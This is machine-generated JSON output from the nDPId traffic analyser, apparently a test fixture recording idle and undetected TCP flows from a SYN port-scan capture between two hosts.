-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5550,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1455,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1455,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1455,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1455,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1461,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1461,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1461,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1461,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5560,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5560,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3517,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3517,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3517,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3517,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52673,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52673,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1098,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3527,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1098,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3527,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7625,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7625,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7627,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50636,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 